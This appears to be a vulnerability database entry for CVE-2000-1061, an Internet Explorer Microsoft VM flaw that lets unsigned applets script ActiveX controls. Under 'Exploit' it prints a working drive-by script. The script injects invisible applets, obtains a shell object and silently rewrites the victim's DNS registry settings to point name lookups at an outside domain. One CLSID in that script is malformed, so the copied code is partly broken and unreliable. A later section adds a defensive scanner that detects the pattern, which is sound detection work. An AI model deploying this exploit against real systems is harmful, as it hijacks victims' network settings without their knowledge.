Internet Explorer Microsoft Virtual Machine (VM) Security Settings Bypass and Command Execution Vulnerability

Vulnerability ID: 1106027
Vulnerability type: Unknown
Published: 2000-10-05
Updated: 2005-10-12
CVE ID: CVE-2000-1061
CNNVD ID: CNNVD-200012-010
Platform: Windows
CVSS score: 5.1
|Vulnerability Source
https://www.exploit-db.com/exploits/20266
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200012-010
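|Vulnerability Details
In the Microsoft Virtual Machine (VM) in Internet Explorer 4.x and 5.x, unsigned applets can create and use ActiveX controls. Remote attackers can use a malformed web page or email to bypass Internet Explorer security settings and execute arbitrary commands. This vulnerability is also known as the "Microsoft VM ActiveX Component" vulnerability.
|Exploit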
source: http://www.securityfocus.com/bid/1754/info

If a malicious website operator were to embed a specially crafted Java object into an HTML document, it would be possible to execute arbitrary programs on a target host viewing the webpage through either Microsoft Internet Explorer or Outlook. The com.ms.activeX.ActiveXComponent Java object inserted into an <APPLET> tag will allow the creation and scripting of arbitrary ActiveX objects even if they may present security hazards.

Even if Outlook has had the 'security update' applied, it is still possible to circumvent the disabling of active script execution through the use of Java.

Execution of arbitrary programs could make it possible for the malicious website operator to gain rights equivalent to those of the current user. 

<script>
document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>");
function yuzi3(){
  try{
    a1=document.applets[0];
    a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
    a1.createInstance();
    Shl = a1.GetObject();
    a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");
    try{
      Shl.RegWrite("HKLM\\System\\CurrentControlSet\\Services\\VxD\\MSTCP\\SearchList","roots-servers.net");
    }
    catch(e){}
  }
  catch(e){}
}
setTimeout("yuzi3()",1000);
document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>");
function yuzi2(){
  try{
    a2=document.applets[0];
    a2.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
    a2.createInstance();
    Shl = a2.GetObject();
    a2.setCLSID("{0D43FE01-F093-11CF-89400-0A0C9054228}");
    try{
      Shl.RegWrite("HKLM\\System\\CurrentControlSet\\Services\\VxD\\MSTCP\\EnableDns","1");
    }
    catch(e){}
  }
  catch(e){}
}
setTimeout("yuzi2()",1000);
</script>
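
A defender-side check for the pattern described above, as an added example that is not part of the original advisory or exploit: it scans a web page or mail body for <APPLET> tags that load com.ms.activeX.ActiveXComponent, including tags emitted through document.write, and lists any CLSIDs passed to setCLSID(). The function names and both sample inputs are constructed for illustration.

```javascript
// Added example (not from the original page): flag HTML or mail bodies that load
// the Microsoft VM class com.ms.activeX.ActiveXComponent through an <APPLET> tag.
const TARGET_CLASS = "com.ms.activex.activexcomponent";

// Decode numeric HTML entities so "co&#109;.ms..." cannot hide the class name.
function decodeEntities(s) {
  return s.replace(/&#(x[0-9a-f]+|\d+);?/gi, (_, n) => {
    const cp = parseInt(n.replace(/^x/i, "0x"));
    return cp <= 0x10ffff ? String.fromCodePoint(cp) : "";
  });
}

// Parse one tag into a lower-cased attribute map (quoted or unquoted values).
function parseAttrs(tag) {
  const attrs = {};
  const unescaped = tag.replace(/\\(["'])/g, "$1"); // tag may sit in a JS string
  const re = /([a-z][\w-]*)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+))/gi;
  for (const m of unescaped.matchAll(re)) {
    attrs[m[1].toLowerCase()] = decodeEntities(m[2] ?? m[3] ?? m[4]).trim();
  }
  return attrs;
}

// Normalise a CODE value: "com/ms/activeX/ActiveXComponent.class" -> dotted, lower case.
function normaliseClass(code) {
  return (code || "").replace(/\.class$/i, "").replace(/\//g, ".").toLowerCase();
}

// Returns the matching applet tags plus any CLSIDs passed to setCLSID().
function scanHtml(html) {
  const applets = [];
  // Scanning raw text also catches tags emitted via document.write("...").
  for (const m of html.matchAll(/<applet\b[^>]*>/gi)) {
    const a = parseAttrs(m[0]);
    if (normaliseClass(a.code) !== TARGET_CLASS) continue;
    applets.push({ offset: m.index, invisible: a.width === "0" || a.height === "0" });
  }
  const clsids = [...html.matchAll(/setCLSID\s*\(\s*\\?["']\{?([0-9a-f-]{36})\}?/gi)]
    .map((m) => m[1].toUpperCase());
  return { suspicious: applets.length > 0, applets, clsids };
}

// Constructed samples: a hidden applet written from script, and a benign applet.
const SAMPLE_HIT = '<script>document.write("<APPLET HEIGHT=0 WIDTH=0 ' +
  'code=com.ms.activeX.ActiveXComponent></APPLET>");' +
  'a=document.applets[0];a.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");</script>';
const SAMPLE_BENIGN = '<applet code="Clock.class" width="100" height="50"></applet>';

console.log(JSON.stringify(scanHtml(SAMPLE_HIT)), scanHtml(SAMPLE_BENIGN).suspicious);
```

A zero-size applet is reported as `invisible`, which matches the HEIGHT=0 WIDTH=0 tag used in the exploit above.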
|References

Source: MS
Name: MS00-075
Link: http://www.microsoft.com/technet/security/bulletin/MS00-075.asp
Source: XF
Name: java-vm-applet
Link: http://xforce.iss.net/static/5127.php